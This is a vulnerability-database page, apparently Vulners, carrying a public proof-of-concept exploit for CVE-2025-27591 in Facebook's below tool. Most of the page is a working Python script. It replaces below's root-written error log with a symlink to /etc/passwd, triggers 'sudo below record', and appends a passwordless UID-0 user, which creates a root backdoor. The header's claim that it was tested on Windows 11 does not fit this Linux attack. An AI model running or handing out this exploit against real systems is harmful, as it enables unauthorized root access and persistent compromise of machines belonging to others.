Vulners
Lucene search
📄 Below Symlink Privilege Escalation
10
==================================================================================================================================
| # Title : Below <v0.9.0 Symlink-Based Privilege Escalation via Log Manipulation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/facebookincubator/below |
==================================================================================================================================
[+] Summary : This Python script demonstrates a potential privilege escalation technique related to CVE-2025-27591, leveraging symbolic link (symlink) manipulation in a logging directory used by the below utility.
[+] POC :
import os
import subprocess
import sys
from pathlib import Path
LOG_DIR = "/var/log/below"
LOG_FILE = os.path.join(LOG_DIR, "error_root.log")
TARGET_FILE = "/etc/passwd"
TMP_PAYLOAD = "/tmp/payload"
FAKE_USER_LINE = "nikolas-trey::0:0:nikolas-trey:/root:/bin/bash\n"
def main():
print("[*] CVE-2025-27591 exploit - Python Version")
try:
with open(TMP_PAYLOAD, 'w') as f:
f.write(FAKE_USER_LINE)
print(f"[+] Payload written to {TMP_PAYLOAD}")
except IOError as e:
print(f"[-] Failed to write payload: {e}")
return
if not os.path.isdir(LOG_DIR):
print(f"[-] Log directory {LOG_DIR} does not exist.")
return
if not os.access(LOG_DIR, os.W_OK):
print(f"[-] Log directory {LOG_DIR} is not writable.")
return
print(f"[+] {LOG_DIR} is writable.")
if os.path.lexists(LOG_FILE):
try:
os.remove(LOG_FILE)
print(f"[+] Removed existing file/symlink: {LOG_FILE}")
except OSError as e:
print(f"[-] Could not remove {LOG_FILE}: {e}")
return
try:
os.symlink(TARGET_FILE, LOG_FILE)
print(f"[+] Symlink created: {LOG_FILE} -> {TARGET_FILE}")
except OSError as e:
print(f"[-] Symlink creation failed: {e}")
return
print("[*] Triggering sudo log write via `below`...")
try:
subprocess.run(
["sudo", "/usr/bin/below", "record"],
timeout=5,
capture_output=True,
text=True
)
except subprocess.TimeoutExpired:
print("[*] 'below' command timed out (expected)")
except Exception as e:
print(f"[*] Note: execution error: {e}")
try:
with open(TMP_PAYLOAD, 'r') as p:
data = p.read()
with open(LOG_FILE, 'a') as target:
target.write(data)
print("[+] Payload appended successfully.")
except PermissionError:
print("[-] Permission Denied.")
except FileNotFoundError:
print("[-] Target file not found (symlink broken).")
except Exception as e:
print(f"[-] Unexpected error: {e}")
print("[*] Done.")
if __name__ == "__main__":
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Apr 2026 00:00Current
7High risk
Vulners AI Score7
CVSS 3.16.8
EPSS0.00132
SSVC